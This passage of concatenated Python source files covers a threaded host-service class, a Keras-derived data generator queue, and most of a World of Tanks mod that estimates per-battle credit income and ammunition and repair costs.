KeyboardInterrupt: self.stop() def handle(self): """ Main execution code in the circulation of host service. This method can be overrided according to different scene. """ pass def setup_services(self): """ Setup component-services, default []. Subclass can add the compnents services to self.services attribute by overriding this method. """ self.services = [] def stop(self): """ Stop process Clear running event and waiting for service stop gracefully. """ self.running.clear() for thread_obj in self.services_threads_group.values(): thread_obj.join() def guard_services(self): """ Guard component services registed in the host service. Check and restart the component-services every 1s. Note component service must be the subclass of BaseComponentService. """ for service_obj in self.services: _service_name = service_obj.__class__ if (_service_name not in self.services_threads_group) or not ( self.services_threads_group[_service_name].is_alive() ): if not isinstance(service_obj, BaseComponentService): logger.error("Invalid BaseComponentService.") continue _thread_obj = threading.Thread(target=lambda _s: _s.start(), args=(service_obj,)) self.services_threads_group[_service_name] = _thread_obj logger.info("Start to run service {}, the interval is {} sec".format(service_obj, service_obj.interval)) _thread_obj.start()
data_util.py
''' this file is modified from keras implemention of data process multi-threading, see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py ''' #!/usr/bin/env python3 # -*- coding:utf-8 -*- import time import numpy as np import threading import multiprocessing try: import queue except ImportError: import Queue as queue class GeneratorEnqueuer(): """Builds a queue out of a data generator. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. # Arguments generator: a generator function which endlessly yields data use_multiprocessing: use multiprocessing if True, otherwise threading wait_time: time to sleep in-between calls to `put()` random_seed: Initial seed for workers, will be incremented by one for each workers. """ def __init__(self, generator, use_multiprocessing=False, wait_time=0.05, random_seed=None): self.wait_time = wait_time self._generator = generator self._use_multiprocessing = use_multiprocessing self._threads = [] self._stop_event = None self.queue = None self.random_seed = random_seed def start(self, workers=1, max_queue_size=10): """Kicks off threads which add data from the generator into the queue. # Arguments workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`) """ def data_generator_task(): while not self._stop_event.is_set(): try: if self._use_multiprocessing or self.queue.qsize() < max_queue_size: generator_output = next(self._generator) self.queue.put(generator_output) else: time.sleep(self.wait_time) except Exception: self._stop_event.set() raise try: if self._use_multiprocessing: self.queue = multiprocessing.Queue(maxsize=max_queue_size) self._stop_event = multiprocessing.Event() else: self.queue = queue.Queue() self._stop_event = threading.Event() for _ in range(workers): if self._use_multiprocessing: # Reset random seed else all children processes # share the same seed np.random.seed(self.random_seed) thread = multiprocessing.Process(target=data_generator_task) thread.daemon = True if self.random_seed is not None: self.random_seed += 1 else: thread = threading.Thread(target=data_generator_task) self._threads.append(thread) thread.start() except: self.stop() raise def is_running(self): return self._stop_event is not None and not self._stop_event.is_set() def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. # Arguments timeout: maximum time to wait on `thread.join()`. """ if self.is_running(): self._stop_event.set() for thread in self._threads: if thread.is_alive(): if self._use_multiprocessing: thread.terminate() else: thread.join(timeout) if self._use_multiprocessing: if self.queue is not None: self.queue.close() self._threads = [] self._stop_event = None self.queue = None def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. # Returns A generator """ while self.is_running(): if not self.queue.empty(): inputs = self.queue.get() if inputs is not None: yield inputs else: time.sleep(self.wait_time)
mod_creditCalc.py
# -*- coding: utf-8 -*- import codecs as p__codecs import collections as p__collections import json as p__json import os as p__os import threading as p__threading from Queue import Queue as p__Queue from functools import partial as p__partial # noinspection PyUnresolvedReferences from gui.mods.mod_mods_gui import COMPONENT_ALIGN as p__COMPONENT_ALIGN, COMPONENT_EVENT as p__COMPONENT_EVENT, COMPONENT_TYPE as p__COMPONENT_TYPE, g_gui as p__g_gui, g_guiFlash as p__g_flash import BattleReplay as p__BattleReplay import BigWorld as p__BigWorld import Event import Keys as p__Keys import ResMgr as p__ResMgr from Avatar import PlayerAvatar as p__PlayerAvatar from BattleFeedbackCommon import BATTLE_EVENT_TYPE as p__BATTLE_EVENT_TYPE from CurrentVehicle import g_currentVehicle as p__g_currentVehicle from PlayerEvents import g_playerEvents as p__g_playerEvents from constants import ARENA_BONUS_TYPE as p__ARENA_BONUS_TYPE from frameworks.wulf import WindowLayer as ViewTypes from gui import InputHandler as p__InputHandler from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView as p__LobbyView from gui.Scaleform.daapi.view.meta.CrewMeta import CrewMeta as p__CrewMeta from gui.Scaleform.framework import ScopeTemplates, ViewSettings, g_entitiesFactories from gui.Scaleform.framework.entities.View import View from gui.Scaleform.framework.managers.loaders import SFViewLoadParams from gui.Scaleform.genConsts.HANGAR_ALIASES import HANGAR_ALIASES from gui.app_loader.settings import APP_NAME_SPACE from gui.battle_control.arena_info import vos_collections as p__vos_collections from gui.battle_control.battle_constants import VEHICLE_DEVICE_IN_COMPLEX_ITEM, VEHICLE_VIEW_STATE from gui.battle_control.controllers import feedback_events as p__feedback_events from gui.shared import EVENT_BUS_SCOPE, events, g_eventBus from gui.shared.formatters import icons from gui.shared.gui_items import Vehicle from gui.shared.personality import ServicesLocator, ServicesLocator as p__ServicesLocator from helpers import getLanguageCode as p__getLanguageCode from messenger.formatters.service_channel import BattleResultsFormatter as p__BattleResultsFormatter try: # noinspection PyUnresolvedReferences from gui import oldskool # noinspection PyUnresolvedReferences oldskoolCore = p__BigWorld.oldskoolCore except Exception: oldskoolCore = False oldskoolCore = False class flashInHangar(): def __init__(self): g_eventBus.addListener(events.ComponentEvent.COMPONENT_REGISTERED, self.__componentRegisteringHandler, scope=EVENT_BUS_SCOPE.GLOBAL) g_eventBus.addListener(events.AppLifeCycleEvent.INITIALIZED, self.__onAppInitialized, scope=EVENT_BUS_SCOPE.GLOBAL) g_entitiesFactories.addSettings(ViewSettings('creditCalc', FlashMeta, 'creditCalc.swf', ViewTypes.WINDOW, None, ScopeTemplates.GLOBAL_SCOPE)) self.onHeaderUpdate = Event.Event() self.onHangarLoaded = Event.Event() self.setPosition = Event.Event() self.setBackground = Event.Event() self.setText = Event.Event() def __onAppInitialized(self, event): if event.ns == APP_NAME_SPACE.SF_LOBBY: app = ServicesLocator.appLoader.getApp(event.ns) if app is None: return app.loadView(SFViewLoadParams('creditCalc')) def __componentRegisteringHandler(self, event): if event.alias == HANGAR_ALIASES.AMMUNITION_PANEL: if not p__config.p__data['hangar_show']: return self.setPosition(p__config.p__data['hangar_x'], p__config.p__data['hangar_y']) # x and y self.setBackground(p__config.p__data['battle_background'], '0x000000', 0.4) # change to false if dont want # self.setText('Test Test Test') # text class FlashMeta(View): def _populate(self): super(FlashMeta, self)._populate() p__flashInHangar.setText += self._setText p__flashInHangar.setPosition += self._setPosition p__flashInHangar.setBackground += self._setBackground def _dispose(self): super(FlashMeta, self)._dispose() def py_newPos(self, posX, posY): p__config.p__data['hangar_x'] = posX p__config.p__data['hangar_y'] = posY p__config.p__apply(p__config.p__data) def _setText(self, text): if self._isDAAPIInited(): self.flashObject.as_setText(text) def _setPosition(self, x, y): if self._isDAAPIInited(): self.flashObject.as_setPosition(x, y) def _setBackground(self, enabled, bgcolor, alpha): if self._isDAAPIInited(): self.flashObject.as_setBackground(enabled, bgcolor, alpha) p__CHASSIS_ALL_ITEMS = frozenset(VEHICLE_DEVICE_IN_COMPLEX_ITEM.keys() + VEHICLE_DEVICE_IN_COMPLEX_ITEM.values()) p__DAMAGE_EVENTS = frozenset([p__BATTLE_EVENT_TYPE.RADIO_ASSIST, p__BATTLE_EVENT_TYPE.TRACK_ASSIST, p__BATTLE_EVENT_TYPE.STUN_ASSIST, p__BATTLE_EVENT_TYPE.DAMAGE, p__BATTLE_EVENT_TYPE.TANKING, p__BATTLE_EVENT_TYPE.RECEIVED_DAMAGE]) p__DEBUG = True p__DEBUG_COEFF = True class p__Config(object): def __init__(self): self.p__ids = 'creditCalc' self.author = 'www.b4it.org' self.version = 'v2.07 (2021-07-10)' self.version_id = 207 self.p__versionI18n = 3400 lang = p__getLanguageCode().lower() self.p__data = { 'version' : self.version_id, 'enabled' : True, 'battle_x' : 60, 'battle_y' : -252, 'hangar_x' : 325.0, 'hangar_y' : 505.0, 'battle_background': True, 'battle_show' : True, 'hangar_background': True, 'hangar_show' : True, } self.p__i18n = { 'version' : self.p__versionI18n, 'UI_description' : 'creditCalc', 'UI_setting_label_text' : 'Calc Credits in Battle, +1000 or -1000 silver difference: that\'s normal dispersion, if greater: Play one battle without damage.', 'UI_setting_label_tooltip' : '', 'UI_setting_label1_text' : 'Wait until the battle is complete without escape into the hangar. Income: Green Victory, Red Defeat, Outcome: ammo and consumables.', 'UI_setting_label1_tooltip' : '', 'UI_setting_label2_text' : 'Additional info in battle: Press Alt and Control buttons', 'UI_setting_label2_tooltip' : '', 'UI_setting_battleBackground_text' : 'Background in battle', 'UI_setting_battleBackground_tooltip': '', 'UI_setting_hangarBackground_text' : 'Background in hangar', 'UI_setting_hangarBackground_tooltip': '', 'UI_setting_battleShow_text' : 'Show in hangar', 'UI_setting_battleShow_tooltip' : '', 'UI_setting_hangarShow_text' : 'Show in battle', 'UI_setting_hangarShow_tooltip' : '', } if 'ru' in lang: self.p__i18n.update({ 'UI_setting_label_text' : 'Калькуляция серебра в бою, +1000 или -1000 разницы: Нормальный разброс, если разброс больше, проведите один бой без урона', 'UI_setting_label_tooltip' : '', 'UI_setting_label1_text' : 'Дождитесь завершения боя без выхода в ангар. Доход: Зеленый победа, Красный поражение, Расходы: цена снарядов и расходников', 'UI_setting_label1_tooltip' : '', 'UI_setting_label2_text' : 'Дополнительная информация в бою: Нажмите кнопки АЛЬТ и КОНТРОЛ', 'UI_setting_label2_tooltip' : '', 'UI_setting_battleBackground_text' : 'Задний фон в бою', 'UI_setting_battleBackground_tooltip': '', 'UI_setting_hangarBackground_text' : 'Задний фон в ангаре', 'UI_setting_hangarBackground_tooltip': '', 'UI_setting_battleShow_text' : 'Показывать в ангаре', 'UI_setting_battleShow_tooltip' : '', 'UI_setting_hangarShow_text' : 'Показывать в бою', 'UI_setting_hangarShow_tooltip' : '', }) if 'cn' in lang or 'zh' in lang: self.p__i18n.update({ "UI_description" : "银币收益计算", "UI_setting_battleBackground_text" : "在战斗中的消耗", "UI_setting_battleBackground_tooltip": "", "UI_setting_battleShow_text" : "在机库中显示", "UI_setting_battleShow_tooltip" : "", "UI_setting_hangarBackground_text" : "机库的背景", "UI_setting_hangarBackground_tooltip": "", "UI_setting_hangarShow_text" : "显示在战斗中", "UI_setting_hangarShow_tooltip" : "", "UI_setting_label1_text" : "等到战斗结束返回到机库. 收益:绿色为胜利, 红色为失败, 结果: 弹药和消耗品.", "UI_setting_label1_tooltip" : "", "UI_setting_label2_text" : "战斗中的详细情报:按Alt和Control按钮", "UI_setting_label2_tooltip" : "", "UI_setting_label_text" : "在战斗中的得分, +1000或-1000银币差额: 这是正常的分数, 如果更好的: 发挥战斗造成损伤.", "UI_setting_label_tooltip" : "", }) if p__g_gui: self.p__data, self.p__i18n = p__g_gui.register_data(self.p__ids, self.p__data, self.p__i18n, 'www.b4it.org') p__g_gui.register(self.p__ids, self.p__template, self.p__data, self.p__apply) print '[LOAD_MOD]: [%s %s, %s]' % (self.p__ids, self.version, self.author) def p__template(self): return { 'modDisplayName' : self.p__i18n['UI_description'], 'settingsVersion': self.version_id, 'enabled' : self.p__data['enabled'], 'column1' : [ { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_hangarShow_text'], 'value' : self.p__data['hangar_show'], 'tooltip': self.p__i18n['UI_setting_battleShow_tooltip'], 'varName': 'hangar_show' }, { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_battleShow_text'], 'value' : self.p__data['battle_show'], 'tooltip': self.p__i18n['UI_setting_battleShow_tooltip'], 'varName': 'battle_show' }, { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_hangarBackground_text'], 'value' : self.p__data['hangar_background'], 'tooltip': self.p__i18n['UI_setting_battleBackground_tooltip'], 'varName': 'hangar_background' }, { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_battleBackground_text'], 'value' : self.p__data['battle_background'], 'tooltip': self.p__i18n['UI_setting_battleBackground_tooltip'], 'varName': 'battle_background' }, { 'type' : 'Label', 'text' : self.p__i18n['UI_setting_label_text'], 'tooltip': self.p__i18n['UI_setting_label_tooltip'], }, { 'type' : 'Label', 'text' : self.p__i18n['UI_setting_label1_text'], 'tooltip': self.p__i18n['UI_setting_label1_tooltip'], }, { 'type' : 'Label', 'text' : self.p__i18n['UI_setting_label2_text'], 'tooltip': self.p__i18n['UI_setting_label2_tooltip'], } ], 'column2' : [] } def p__apply(self, settings): if p__g_gui: self.p__data = p__g_gui.update_data(self.p__ids, settings, 'www.b4it.org') p__g_gui.update(self.p__ids, self.p__template) class p__MyJSONEncoder(p__json.JSONEncoder): def __init__(self, *args, **kwargs): super(p__MyJSONEncoder, self).__init__(*args, **kwargs) self.current_indent = 0 self.current_indent_str = "" self.indent = 4 def encode(self, o): # Special Processing for lists if isinstance(o, (list, tuple)): primitives_only = True for item in o: if isinstance(item, (list, tuple, dict)): primitives_only = False break output = [] if primitives_only: for item in o: output.append(p__json.dumps(item, ensure_ascii=False, encoding='utf-8-sig')) return "[ " + ", ".join(output) + " ]" else: self.current_indent += self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) for item in o: output.append(self.current_indent_str + self.encode(item)) self.current_indent -= self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) return "[\n" + ",\n".join(output) + "\n" + self.current_indent_str + "]" elif isinstance(o, dict): output = [] self.current_indent += self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) for key, value in o.iteritems(): output.append(self.current_indent_str + p__json.dumps(key, ensure_ascii=False, encoding='utf-8-sig') + ": " + self.encode(value)) self.current_indent -= self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) return "{\n" + ",\n".join(output) + "\n" + self.current_indent_str + "}" else: return p__json.dumps(o, ensure_ascii=False, encoding='utf-8-sig') class p__CreditsCalculator(object): def __init__(self): self.p__coeffTable() self.p__COEFFICIENTS['USE_DATA'] = False self.p__AVERAGES = [(1.37, 1.37), (1.13, 1.28), (1.04, 1.35), (1.029, 1.42), (1.04, 1.5), (0.92, 1.3), (0.82, 1.4), (0.75, 1.5), (0.72, 0.72), (0.71, 0.72)] self.p__coeffDefaults = [0.53, 0.583, 0.6, 0.605, 0.62, 0.625, 0.63, 0.632, 0.633, 0.64, 0.65, 0.659, 0.66, 0.67, 0.6745, 0.68, 0.69, 0.7, 0.702, 0.708, 0.71, 0.711, 0.715, 0.72, 0.721, 0.724, 0.725, 0.73, 0.732, 0.734, 0.735, 0.745, 0.75, 0.751, 0.752, 0.753, 0.756, 0.759, 0.76, 0.764, 0.77, 0.774, 0.776, 0.777, 0.779, 0.78, 0.782, 0.783, 0.787, 0.788, 0.79, 0.791, 0.793, 0.795, 0.797, 0.798, 0.8, 0.802, 0.804, 0.805, 0.817, 0.82, 0.824, 0.825, 0.828, 0.83, 0.835, 0.836, 0.84, 0.847, 0.85, 0.854, 0.858, 0.861, 0.865, 0.868, 0.873, 0.874, 0.88, 0.883, 0.892, 0.894, 0.899, 0.9, 0.901, 0.906, 0.907, 0.909, 0.912, 0.9125, 0.915, 0.918, 0.922, 0.925, 0.928, 0.93, 0.931, 0.932, 0.935, 0.943, 0.945, 0.95, 0.964, 0.968, 0.969, 0.975, 0.976, 0.98, 0.987, 0.99, 0.997, 1.0, 1.0044, 1.0074, 1.012, 1.018, 1.02, 1.025, 1.026, 1.03, 1.0336, 1.044, 1.045, 1.046, 1.05, 1.053, 1.057, 1.07, 1.077, 1.08, 1.085, 1.086, 1.088, 1.089, 1.09, 1.0902, 1.093, 1.094, 1.1, 1.102, 1.104, 1.108, 1.109, 1.11, 1.113, 1.115, 1.12, 1.122, 1.127, 1.128, 1.129, 1.14, 1.1425, 1.15, 1.154, 1.1585, 1.168, 1.17, 1.1782, 1.18, 1.199, 1.2, 1.21, 1.219, 1.22, 1.25, 1.253, 1.2558, 1.26, 1.27, 1.276, 1.3, 1.311, 1.3145, 1.33, 1.35, 1.36, 1.365, 1.38, 1.4, 1.419, 1.43, 1.437, 1.44, 1.445, 1.45, 1.46, 1.4734, 1.48, 1.485, 1.49, 1.5, 1.52, 1.53, 1.55, 1.56, 1.57, 1.575, 1.59, 1.6, 1.62, 1.63, 1.637, 1.64, 1.65, 1.67, 1.75, 1.81] resMgr = p__ResMgr.openSection('../version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('./version.xml') ver = 'temp' if resMgr is None else resMgr.readString('version') i1 = ver.find('.') i2 = ver.find('#') self.p__PATH = ''.join(['./res_mods/', ver[i1 + 1:i2 - 1], '/system/']) self.p__readJson() self.p__PREMIUM_ACC = self.p__COEFFICIENTS['USE_DATA'] self.p__iconCredits = '<img src=\"img://gui/maps/icons/quests/bonuses/big/credits.png\" vspace=\"-7\" width=\"20\" height=\"20\" />' self.p__textWin = '' self.p__textDEFEAT = '' self.p__tempResults = {} self.p__item = None self.p__altMode = False self.p__ctrlMode = False self.p__hangarOutcome = 0 self.p__hangarItems = {} self.p__hangarAmmo = {} self.p__killed = False self.p__repairCost = 0 self.p__costRepairs = {} self.p__usedItems = {} self.p__hangarHeader = '' def p__byte_ify(self, p__inputs): if p__inputs: if isinstance(p__inputs, dict): return {self.p__byte_ify(key): self.p__byte_ify(value) for key, value in p__inputs.iteritems()} elif isinstance(p__inputs, list): return [self.p__byte_ify(element) for element in p__inputs] elif isinstance(p__inputs, unicode): return p__inputs.encode('utf-8') else: return p__inputs return p__inputs def p__writeJson(self): if not p__os.path.exists(self.p__PATH): p__os.makedirs(self.p__PATH) with p__codecs.open(self.p__PATH + 'sw_templates.json', 'w', encoding='utf-8-sig') as p__json_file: p__data = p__json.dumps(p__collections.OrderedDict(sorted(self.p__COEFFICIENTS.items(), key=lambda t: t[0])), sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '), cls=p__MyJSONEncoder) p__json_file.write('%s' % self.p__byte_ify(p__data)) p__json_file.close() def p__readJson(self): if p__os.path.isfile(self.p__PATH + 'sw_templates.json'): try: with p__codecs.open(self.p__PATH + 'sw_templates.json', 'r', encoding='utf-8-sig') as p__json_file: p__data = p__json_file.read().decode('utf-8-sig') self.p__COEFFICIENTS.update(self.p__byte_ify(p__json.loads(p__data))) p__json_file.close() except Exception as e: self.p__writeJson() else: self.p__writeJson() def p__getHangarData(self, isPremium): if self.p__COEFFICIENTS['USE_DATA'] != isPremium: self.p__COEFFICIENTS['USE_DATA'] = isPremium self.p__writeJson() self.p__PREMIUM_ACC = isPremium # outcomeFull = 0 outcome = 0 for installedItem in p__g_currentVehicle.item.battleBoosters.installed.getItems(): price = installedItem.buyPrices.getSum().price.credits # outcomeFull += price if not installedItem.inventoryCount else installedItem.getSellPrice().price.credits outcome += price if not installedItem.inventoryCount else 0 self.p__hangarOutcome = outcome self.p__hangarItems = {} for installedItem in p__g_currentVehicle.item.consumables.installed.getItems(): price = installedItem.buyPrices.getSum().price.credits self.p__hangarItems[installedItem.intCD] = [price if not installedItem.inventoryCount else 0, price if not installedItem.inventoryCount else installedItem.getSellPrice().price.credits] self.p__hangarAmmo = {} for ammo in p__g_currentVehicle.item.gun.defaultAmmo: self.p__hangarAmmo[ammo.intCD] = [ammo.buyPrices.getSum().price.credits if not ammo.inventoryCount else ammo.getSellPrice().price.credits, 0, 0] if p__DEBUG or p__DEBUG_COEFF: if p__g_currentVehicle.item: if self.p__item == p__g_currentVehicle.item.descriptor.type.compactDescr: return vehicleCompDesc, balanceCoeff = self.p__deCode(p__g_currentVehicle.item.descriptor.type.compactDescr) if not balanceCoeff: ids = 1 if 'premium' in p__g_currentVehicle.item.tags else 0 balanceCoeff = self.p__AVERAGES[p__g_currentVehicle.item.level - 1][ids] text = '<b> {0} calcCredits {1} {0}\n '.format(icons.nutStat() * 3, 'to <font color=\"#6595EE\">oldskool.vip</font>' if oldskoolCore else 'by <font color=\"#6595EE\">www.b4it.org</font>') text += icons.makeImageTag(Vehicle.getTypeSmallIconPath(p__g_currentVehicle.item.type, p__g_currentVehicle.item.isPremium), width=30, height=30, vSpace=-7 if p__g_currentVehicle.item.isPremium else -5) + p__g_currentVehicle.item.shortUserName text += ' : %s %s%s%% %s</b>' % (icons.creditsBig(), 'coeff:', round(balanceCoeff * 100, 2), '') self.p__hangarHeader = text self.p__hangarMessage() self.p__item = p__g_currentVehicle.item.descriptor.type.compactDescr def p__timer(self): player = p__BigWorld.player() vehicle = player.getVehicleAttached() if vehicle: self.p__startBattle() return p__BigWorld.callback(0.1, self.p__timer) def p__code(self, p__compactDescr, p__balanceCoeff): test = '%s' % (p__compactDescr * 2847 * 122) self.p__COEFFICIENTS[test] = int(round(p__balanceCoeff * 10000.0)) * 1231 * 487 self.p__writeJson() return test, self.p__COEFFICIENTS[test] def p__deCode(self, p__compactDescr): test = '%s' % (p__compactDescr * 2847 * 122) if test in self.p__COEFFICIENTS: return test, round(self.p__COEFFICIENTS[test] / 1231 / 487 * 0.0001, 6) return test, 0.0 def p__startBattle(self): self.p__altMode = False self.p__ctrlMode = False player = p__BigWorld.player() p__InputHandler.g_instance.onKeyDown += self.p__keyPressed p__InputHandler.g_instance.onKeyUp += self.p__keyPressed player.arena.onVehicleKilled += self.p__onVehicleKilled # if player.guiSessionProvider.shared.vehicleState is not None: # player.guiSessionProvider.shared.vehicleState.onVehicleStateUpdated += self.p__deviceTouched ammoCtrl = player.guiSessionProvider.shared.ammo if ammoCtrl is not None: ammoCtrl.onShellsAdded += self.p__onShellsAdded ammoCtrl.onShellsUpdated += self.p__onShellsUpdated p__flash.p__startBattle() p__flash.p__visible(False) vehicle = player.getVehicleAttached() self.p__costRepairs.update({ 'gun' : vehicle.typeDescriptor.gun.maxRepairCost, 'engine' : vehicle.typeDescriptor.engine.maxRepairCost, 'turretRotator' : vehicle.typeDescriptor.turret.turretRotatorHealth.maxRepairCost, 'surveyingDevice': vehicle.typeDescriptor.turret.surveyingDeviceHealth.maxRepairCost, 'ammoBay' : vehicle.typeDescriptor.hull.ammoBayHealth.maxRepairCost, 'radio' : vehicle.typeDescriptor.radio.maxRepairCost, 'fuelTank' : vehicle.typeDescriptor.fuelTank.maxRepairCost, 'chassis' : vehicle.typeDescriptor.chassis.maxRepairCost }) self.p__costRepairs.update({name: vehicle.typeDescriptor.chassis.maxRepairCost for name in p__CHASSIS_ALL_ITEMS}) if not self.p__hangarItems: self.p__hangarItems = {763: (3000, 3000), 1019: (20000, 20000), 1275: (3000, 3000), 1531: (20000, 20000), 1787: (5000, 5000), 4859: (20000, 20000), 4091: (20000, 20000), 2299: (20000, 20000), 2555: (20000, 20000), 3067: (20000, 20000), 251: (3000, 3000), 3323: (3000, 3000), 4347: (5000, 5000), 3579: (20000, 20000), 15867: (20000, 20000), 25851: (20000, 20000), 16123: (20000, 20000), 2043: (5000, 5000), 16379: (20000, 20000), 16635: (20000, 20000), 4603: (20000, 20000), 507: (20000, 20000)} self.p__usedItems = {} # vehicleName = player.guiSessionProvider.getCtx().getPlayerFullNameParts(vID=vehicle.id).vehicleName self.p__item = None self.p__name = vehicle.typeDescriptor.name self.p__vehicleName = player.guiSessionProvider.getCtx().getPlayerFullNameParts(vID=vehicle.id).vehicleName self.p__level = vehicle.typeDescriptor.level self.p__textWin = '' self.p__textDEFEAT = '' player = p__BigWorld.player() arenaDP = player.guiSessionProvider.getArenaDP() self.p__listAlly = p__vos_collections.AllyItemsCollection().ids(arenaDP) self.p__listAlly.remove(player.playerVehicleID) self.p__PREMIUM_ACC = self.p__COEFFICIENTS['USE_DATA'] self.p__readJson() self.p__SPOT = 0 self.p__ASSIST = 0 self.p__DAMAGE_SELF_SPOT = 0 # 100% sure we're spotting self.p__DAMAGE_OTHER_SPOT = 0 # 100% sure someone else is spotting self.p__DAMAGE_UNKNOWN_SPOT = 0 # uncertanty who is spotting self.p__DAMAGE_STUN = 0 self.p__DAMAGE_ASSIST = 0 self.p__WinResult = 0 self.p__WinResultMin = 0 self.p__DefeatResult = 0 self.p__DefeatResultMin = 0 self.p__premium = 1.5 if self.p__PREMIUM_ACC else 1.0 # точно! self.p__compactDescr, self.p__balanceCoeff = self.p__deCode(vehicle.typeDescriptor.type.compactDescr) if not self.p__balanceCoeff: ids = 1 if 'premium' in vehicle.typeDescriptor.type.tags else 0 self.p__balanceCoeff = self.p__AVERAGES[self.p__level - 1][ids] self.p__killed = False self.p__repairCost = 0 self.p__calc() def p__canSpotTarget(self, targetVehicle): distSq = (targetVehicle.position - p__BigWorld.player().getOwnVehiclePosition()).lengthSquared # assume we can spot target 100% sure at 100m or at 75% of our vision radius if distSq < 10000: return True circularVisionRadius = p__BigWorld.player().guiSessionProvider.shared.feedback.getVehicleAttrs()['circularVisionRadius'] if distSq < circularVisionRadius * circularVisionRadius * 0.75 * 0.75: return True return False def p__canNeverSpotTarget(self, targetVehicle): # we can's spot target outside of our vision radius distSq = (targetVehicle.position - p__BigWorld.player().getOwnVehiclePosition()).lengthSquared circularVisionRadius = p__BigWorld.player().guiSessionProvider.shared.feedback.getVehicleAttrs()['circularVisionRadius'] if distSq > circularVisionRadius * circularVisionRadius: return True return False def p__onBattleEvents(self, events): player = p__BigWorld.player() guiSessionProvider = player.guiSessionProvider radio = 0 track = 0 stun = 0 if guiSessionProvider.shared.vehicleState.getControllingVehicleID() == player.playerVehicleID: for p__data in events: feedbackEvent = p__feedback_events.PlayerFeedbackEvent.fromDict(p__data) eventType = feedbackEvent.getBattleEventType() targetID = feedbackEvent.getTargetID() if eventType == p__BATTLE_EVENT_TYPE.SPOTTED: vehicle = p__BigWorld.entity(targetID) self.p__SPOT += 1 if vehicle and 'SPG' in vehicle.typeDescriptor.type.tags: self.p__SPOT += 1 if eventType in p__DAMAGE_EVENTS: extra = feedbackEvent.getExtra() if extra: if eventType == p__BATTLE_EVENT_TYPE.RADIO_ASSIST: radio += extra.getDamage() if eventType == p__BATTLE_EVENT_TYPE.TRACK_ASSIST: track += extra.getDamage() if eventType == p__BATTLE_EVENT_TYPE.STUN_ASSIST: stun += extra.getDamage() if eventType == p__BATTLE_EVENT_TYPE.DAMAGE: arenaDP = guiSessionProvider.getArenaDP() if arenaDP.isEnemyTeam(arenaDP.getVehicleInfo(targetID).team): vehicle = p__BigWorld.entity(targetID) if vehicle: if vehicle.stunInfo > 0.0: self.p__DAMAGE_STUN += extra.getDamage() elif self.p__canSpotTarget(vehicle): self.p__DAMAGE_SELF_SPOT += extra.getDamage() elif self.p__canNeverSpotTarget(vehicle): self.p__DAMAGE_OTHER_SPOT += extra.getDamage() else: self.p__DAMAGE_UNKNOWN_SPOT += extra.getDamage() data = [radio, track, stun] self.p__ASSIST += max(data) self.p__calc() def p__deviceTouched(self, state, value): if self.p__killed: return player = p__BigWorld.player() ctrl = player.guiSessionProvider.shared vehicle = player.getVehicleAttached() # self.p__repairCost = int(vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth + vehicle.health) # getMaxRepairCost = vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth self.p__repairCost = 0 # int(round(getMaxRepairCost - getMaxRepairCost * vehicle.health / round(vehicle.typeDescriptor.maxHealth))) if state == VEHICLE_VIEW_STATE.DEVICES: # print 'max:%s, maxHP:%s, hp:%s' % (vehicle.typeDescriptor.getMaxRepairCost(), vehicle.typeDescriptor.maxHealth, vehicle.health) # print 'repairCost1:%s' % self.p__repairCost self.p__repairCost = 0 repairs = 0 for equipment in ctrl.equipments.iterEquipmentsByTag('repairkit'): for itemName, deviceState in equipment[1].getEntitiesIterator(): if deviceState == 'destroyed': if itemName in self.p__costRepairs: # print 'module:%s, %s' % (itemName, deviceState) repairs += self.p__costRepairs[itemName] if deviceState == 'critical': if itemName in self.p__costRepairs: # print 'module:%s, %s' % (itemName, deviceState) repairs += self.p__costRepairs[itemName] / 2 self.p__repairCost += int(round(repairs)) # print 'modules:%s' %(repairs) # print 'repairCost2:%s' % self.p__repairCost # print 'repairCost3:%s' % int(round(self.p__repairCost * self.p__balanceCoeff)) self.p__calc() def p__onVehicleKilled(self, target_id, attacker_id, equipment_id, reason): player = p__BigWorld.player() vehicle = player.getVehicleAttached() if target_id == vehicle.id: self.p__killed = True self.p__calc() return # self.p__repairCost = int(vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth + vehicle.health) getMaxRepairCost = vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth self.p__repairCost = int(round(getMaxRepairCost - getMaxRepairCost * vehicle.health / round(vehicle.typeDescriptor.maxHealth))) ctrl = player.guiSessionProvider.shared repairs = 0 for equipment in ctrl.equipments.iterEquipmentsByTag('repairkit'): for itemName, deviceState in equipment[1].getEntitiesIterator(): if deviceState == 'destroyed': if itemName in self.p__costRepairs: repairs += self.p__costRepairs[itemName] if deviceState == 'critical': if itemName in self.p__costRepairs: repairs += self.p__costRepairs[itemName] / 2 self.p__repairCost += int(repairs) self.p__calc() def p__battleOutcome(self): player = p__BigWorld.player() ctrl = player.guiSessionProvider.shared # priceFull = self.p__hangarOutcome[1] price = self.p__hangarOutcome # + int(round(self.p__repairCost * self.p__balanceCoeff)) if not self.p__killed: try: for item in ctrl.equipments.getOrderedEquipmentsLayout(): if item and item[0] in self.p__hangarItems: prevQuantity = item[1].getPrevQuantity() quantity = item[1].getQuantity() if item[0] not in self.p__usedItems: self.p__usedItems[item[0]] = [not prevQuantity and quantity < 65535, self.p__hangarItems[item[0]][1], self.p__hangarItems[item[0]][1]] if prevQuantity > 0 and 1 < quantity < 65535: self.p__usedItems[item[0]][0] = True except Exception as e: pass # print self.p__usedItems for equipment in self.p__usedItems: if self.p__usedItems[equipment][0]: price += 